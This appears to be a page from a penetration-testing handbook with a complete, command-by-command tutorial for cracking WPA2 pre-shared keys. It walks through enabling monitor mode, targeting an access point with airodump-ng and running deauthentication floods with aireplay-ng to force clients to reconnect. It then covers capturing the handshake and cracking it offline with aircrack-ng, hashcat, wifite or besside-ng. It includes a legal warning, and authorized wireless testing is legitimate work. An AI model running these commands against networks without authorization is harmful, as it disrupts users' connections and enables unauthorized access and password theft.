WPA2 PSK Cracking

The Hacking Process Overview

WPA2 PSK (Pre-Shared Key) cracking follows a systematic 6-step process:

  1. Place - Put wireless card into monitor mode

  2. Discover - Discover information about the network (Channel, BSSID)

  3. Select - Select network and capture data

  4. Perform - Perform deauth attack

  5. Capture - Capture WPA handshake

  6. Attempt - Attempt to crack the handshake

Step-by-Step Process

1. Place - Put Wireless Card into Monitor Mode

First, identify your wireless interface and put it into monitor mode:

# Check wireless interfaces
iwconfig

# Kill processes that might interfere
sudo airmon-ng check kill

# Put interface into monitor mode
sudo airmon-ng start wlan0

# Verify monitor mode is active
iwconfig

Your interface should now show as wlan0mon or similar.

2. Discover - Network Information

Use airodump-ng to discover networks and gather information:

# Scan for networks
sudo airodump-ng wlan0mon

Look for:

  • BSSID (MAC address of the access point)

  • Channel number

  • ESSID (network name)

  • Encryption type (WPA2)

  • Connected clients (stations)

3. Select - Target Network and Capture Data

Focus on a specific network and start capturing:

# Capture specific network
sudo airodump-ng -c [CHANNEL] --bssid [BSSID] -w capture wlan0mon

Example:

sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

This will:

  • Monitor channel 6

  • Focus on the specific BSSID

  • Save capture to files starting with "capture"

4. Perform - Deauth Attack

In a new terminal, perform a deauthentication attack to force clients to reconnect:

# Deauth all clients from the AP
sudo aireplay-ng -0 10 -a [BSSID] wlan0mon

# Deauth specific client
sudo aireplay-ng -0 10 -a [BSSID] -c [CLIENT_MAC] wlan0mon

Example:

# Deauth all clients
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Deauth specific client
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

Parameters:

  • -0 = Deauthentication attack

  • 10 = Number of deauth packets to send

  • -a = Access Point BSSID

  • -c = Client MAC address (optional)

5. Capture - WPA Handshake

Monitor the airodump-ng output for the handshake capture:

WPA handshake: AA:BB:CC:DD:EE:FF

When you see this message, the handshake has been captured successfully.

6. Attempt - Crack the Handshake

Use aircrack-ng or hashcat to crack the captured handshake:

Using aircrack-ng:

# Crack with wordlist
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# Crack specific network
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b [BSSID] capture-01.cap

Using hashcat (more efficient):

# Convert .cap to .hccapx format
cap2hccapx capture-01.cap capture.hccapx

# Crack with hashcat (mode 2500 for WPA/WPA2)
hashcat -m 2500 capture.hccapx /usr/share/wordlists/rockyou.txt

# For newer hashcat versions (mode 22000)
hcxpcapngtool -o capture.22000 capture-01.cap
hashcat -m 22000 capture.22000 /usr/share/wordlists/rockyou.txt

Important Notes

Prerequisites

  • Wireless adapter capable of monitor mode and packet injection

  • Target network must have connected clients

  • Legal authorization to test the network

Tips for Success

  1. Patience: Wait for natural client connections if deauth doesn't work

  2. Multiple attempts: Try different deauth techniques

  3. Good wordlists: Use comprehensive wordlists like rockyou.txt

  4. Hardware: Use a good wireless adapter (e.g., Alfa AWUS036ACS)

Common Issues

  • No handshake captured: Try different deauth methods or wait longer

  • Weak signal: Get closer to the target network

  • No clients: Some networks may not have active clients

Legal and Ethical Considerations

⚠️ WARNING: Only perform these attacks on networks you own or have explicit written permission to test. Unauthorized access to wireless networks is illegal in most jurisdictions.

Alternative Tools

Wifite

Automated WPA2 cracking tool:

sudo wifite --wpa --dict /usr/share/wordlists/rockyou.txt

Besside-ng

Another automated approach:

sudo besside-ng -c [CHANNEL] -b [BSSID] wlan0mon

Summary

  • WPA2 PSK cracking requires capturing the 4-way handshake

  • Deauth attacks force clients to reconnect and expose the handshake

  • Success depends on password strength and wordlist quality

  • Always ensure you have proper authorization before testing

PreviousSQL Injection TechniquesNextInformation Gathering

Last updated